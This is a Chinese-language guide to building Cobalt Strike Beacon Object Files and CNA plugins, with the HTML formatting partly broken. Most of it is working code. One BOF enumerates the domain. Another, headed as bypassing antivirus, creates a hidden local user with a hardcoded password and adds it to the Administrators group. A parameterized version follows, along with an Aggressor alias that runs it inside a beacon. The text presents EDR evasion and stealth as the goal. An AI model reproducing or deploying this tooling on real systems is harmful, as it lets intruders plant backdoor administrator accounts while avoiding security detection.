BOF及CNA插件开发指南<\/h1>

1. Beacon Object File (BOF)概述<\/h2>
BOF是一种能够被Cobalt Strike Beacon加载并执行的特殊文件格式，它实际上是C\/C++编译后但未链接的目标文件(.obj)。BOF具有以下特点：<\/p>
体积小，执行效率高<\/li>
在Beacon进程内部运行，不创建新进程<\/li>
可以直接调用Beacon API和Win32 API<\/li>
能有效规避EDR检测<\/li> <\/ul>
2. BOF开发环境准备<\/h2>

2.1 系统要求<\/h3>
操作系统：Windows 10<\/li>
开发工具：Visual Studio 2022<\/li> <\/ul>
2.2 开发模板<\/h3>
使用现成的BOF开发模板可以简化开发流程：<\/p>
下载模板：https:\/\/github.com\/securifybv\/Visual-Studio-BOF-template<\/li>
将模板放入VS模板目录：用户路径\文稿\Visual Studio 2022\Templates\ProjectTemplates<\/code><\/li>
在VS中新建项目时选择该模板<\/li>
<\/ol>
2.3 编译配置<\/h3>

在VS中选择"生成"->"批生成"<\/li>
勾选项目，方案配置选择"BOF"<\/li>
生成后可在项目目录中找到.obj文件<\/li>
<\/ol>
3. BOF开发基础<\/h2>
3.1 动态函数解析(DFR)<\/h3>
BOF中使用动态函数解析来调用系统API，格式如下：<\/p>
DECLSPEC_IMPORT DWORD WINAPI ADVAPI32$<\/span>GetUserNameA(LPSTR, LPDWORD);
<\/span><\/span><\/code><\/pre>
DECLSPEC_IMPORT<\/code>：导入函数关键字<\/li>
WINAPI<\/code>：函数调用约定<\/li>
ADVAPI32<\/code>：函数所在模块名<\/li>
GetUserNameA<\/code>：函数名称<\/li>
<\/ul>
3.2 BOF入口函数<\/h3>
BOF的执行入口是go<\/code>函数，当在Beacon上执行inline-execute<\/code>时会调用此函数：<\/p>
void<\/span> go<\/span>(char<\/span>*<\/span> buff, int<\/span> len) {
<\/span><\/span>    \/\/ BOF功能代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. BOF开发实例<\/h2>
4.1 获取当前域信息<\/h3>
#include<\/span> <windows.h> <\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h> <\/span>
<\/span><\/span><\/span>#include<\/span> <dsgetdc.h> <\/span>
<\/span><\/span><\/span>#include<\/span> "beacon.h" <\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>DECLSPEC_IMPORT DWORD WINAPI NETAPI32$<\/span>DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID);
<\/span><\/span>DECLSPEC_IMPORT DWORD WINAPI NETAPI32$<\/span>NetApiBufferFree(LPVOID);
<\/span><\/span>
<\/span><\/span>void<\/span> go<\/span>(char<\/span>*<\/span> buff, int<\/span> len) {
<\/span><\/span>    DWORD dwRet;
<\/span><\/span>    PDOMAIN_CONTROLLER_INFO pdcInfo;
<\/span><\/span>    dwRet =<\/span> NETAPI32$<\/span>DsGetDcNameA(NULL, NULL, NULL, NULL, 0<\/span>, &<\/span>pdcInfo);
<\/span><\/span>    if<\/span> (ERROR_SUCCESS ==<\/span> dwRet) {
<\/span><\/span>        BeaconPrintf(CALLBACK_OUTPUT, "%s"<\/span>, pdcInfo-><\/span>DomainName);
<\/span><\/span>    }
<\/span><\/span>    NETAPI32$<\/span>NetApiBufferFree(pdcInfo);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2 绕过杀软添加用户<\/h3>
#include<\/span> <windows.h> <\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h> <\/span>
<\/span><\/span><\/span>#include<\/span> "bofdefs.h"<\/span>
<\/span><\/span><\/span>#include<\/span> "beacon.h" <\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>typedef<\/span> DWORD NET_API_STATUS;
<\/span><\/span>DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$<\/span>NetUserAdd(LPWSTR, DWORD, PBYTE, PDWORD);
<\/span><\/span>DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$<\/span>NetLocalGroupAddMembers(LPCWSTR, LPCWSTR, DWORD, PBYTE, DWORD);
<\/span><\/span>
<\/span><\/span>void<\/span> go<\/span>(char<\/span>*<\/span> buff, int<\/span> len) {
<\/span><\/span>    USER_INFO_1 UserInfo;
<\/span><\/span>    UserInfo.usri1_name =<\/span> L<\/span>"Qqw666"<\/span>;            
<\/span><\/span>    UserInfo.usri1_password =<\/span> L<\/span>"Qqw@#123"<\/span>;      
<\/span><\/span>    UserInfo.usri1_priv =<\/span> USER_PRIV_USER;
<\/span><\/span>    UserInfo.usri1_flags =<\/span> UF_SCRIPT;
<\/span><\/span>
<\/span><\/span>    \/\/ 创建用户
<\/span><\/span><\/span><\/span>    NET_API_STATUS nStatus =<\/span> NETAPI32$<\/span>NetUserAdd(NULL, 1<\/span>, (LPBYTE)&<\/span>UserInfo, NULL);
<\/span><\/span>    if<\/span> (nStatus ==<\/span> NERR_Success) {
<\/span><\/span>        BeaconPrintf(CALLBACK_OUTPUT, "NetUserAdd Success!<\/span>\n<\/span>Username: %ws, PassWord: %ws"<\/span>, 
<\/span><\/span>                    UserInfo.usri1_name, UserInfo.usri1_password);
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    \/\/ 添加到管理员组
<\/span><\/span><\/span><\/span>    LOCALGROUP_MEMBERS_INFO_3 account;
<\/span><\/span>    account.lgrmi3_domainandname =<\/span> UserInfo.usri1_name;
<\/span><\/span>    NET_API_STATUS aStatus =<\/span> NETAPI32$<\/span>NetLocalGroupAddMembers(NULL, L<\/span>"Administrators"<\/span>, 3<\/span>, (LPBYTE)&<\/span>account, 1<\/span>);
<\/span><\/span>    if<\/span> (aStatus ==<\/span> NERR_Success) {
<\/span><\/span>        BeaconPrintf(CALLBACK_OUTPUT, "Add to Administrators success!"<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. 参数化BOF开发<\/h2>
5.1 支持自定义用户名和密码<\/h3>
void<\/span> go<\/span>(char<\/span>*<\/span> buff, int<\/span> len) {
<\/span><\/span>    datap parser;
<\/span><\/span>    LPWSTR username, password;
<\/span><\/span>    
<\/span><\/span>    BeaconDataParse(&<\/span>parser, buff, len);
<\/span><\/span>    username =<\/span> (LPWSTR)BeaconDataExtract(&<\/span>parser, NULL);
<\/span><\/span>    password =<\/span> (LPWSTR)BeaconDataExtract(&<\/span>parser, NULL);
<\/span><\/span>
<\/span><\/span>    USER_INFO_1 UserInfo;
<\/span><\/span>    UserInfo.usri1_name =<\/span> username;
<\/span><\/span>    UserInfo.usri1_password =<\/span> password;
<\/span><\/span>    \/\/ ...其余代码同上...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. CNA插件开发<\/h2>
6.1 CNA脚本基础<\/h3>
beacon_command_register<\/span>(
<\/span><\/span>    "adduser"<\/span>, 
<\/span><\/span>    "Add a user to administrators"<\/span>, 
<\/span><\/span>    "usage: adduser [username] [password]"<\/span>);
<\/span><\/span><\/code><\/pre>6.2 完整CNA插件示例<\/h3>
alias<\/span> adduser<\/span>{
<\/span><\/span>    local<\/span>('$handle $data $args'<\/span>);
<\/span><\/span>    $uname<\/span> =<\/span> $2<\/span>;
<\/span><\/span>    $pass<\/span> =<\/span> $3<\/span>;
<\/span><\/span>
<\/span><\/span>    if<\/span> ($uname<\/span> eq<\/span> ""<\/span> or<\/span> $pass<\/span> eq<\/span> ""<\/span>) {
<\/span><\/span>        berror<\/span>($1<\/span>, "usage command: help adduser"<\/span>);
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    \/\/ 读取BOF文件
<\/span><\/span><\/span><\/span>    $handle<\/span> =<\/span> openf<\/span>(script_resource<\/span>("source.obj"<\/span>));
<\/span><\/span>    $data<\/span> =<\/span> readb<\/span>($handle<\/span>, -<\/span>1<\/span>);
<\/span><\/span>    closef<\/span>($handle<\/span>);
<\/span><\/span>
<\/span><\/span>    \/\/ 打包参数("ZZ"表示两个参数)
<\/span><\/span><\/span><\/span>    $args<\/span> =<\/span> bof_pack<\/span>($1<\/span>, "ZZ"<\/span>, $uname<\/span>, $pass<\/span>);
<\/span><\/span>
<\/span><\/span>    \/\/ 执行BOF
<\/span><\/span><\/span><\/span>    beacon_inline_execute<\/span>($1<\/span>, $data<\/span>, "go"<\/span>, $args<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>7. 开发注意事项<\/h2>

权限要求<\/strong>：添加用户等操作需要管理员权限<\/li>
错误处理<\/strong>：应妥善处理API调用失败的情况<\/li>
内存管理<\/strong>：使用后释放分配的内存(如NetApiBufferFree<\/code>)<\/li>
参数传递<\/strong>：使用BeaconDataParse<\/code>和BeaconDataExtract<\/code>解析输入参数<\/li>
输出格式<\/strong>：使用BeaconPrintf<\/code>输出结果<\/li>
<\/ol>
8. 总结<\/h2>
BOF和CNA插件开发为Cobalt Strike提供了强大的扩展能力：<\/p>

可以将常用功能封装为BOF，提高隐蔽性和复用性<\/li>
通过CNA插件可以方便地在Beacon中调用BOF<\/li>
参数化设计使BOF更加灵活<\/li>
所有Windows API调用都可以通过DFR方式实现<\/li>
<\/ol>
通过将常用命令BOF化，可以更好地规避安全检测，提高红队行动的隐蔽性。<\/p>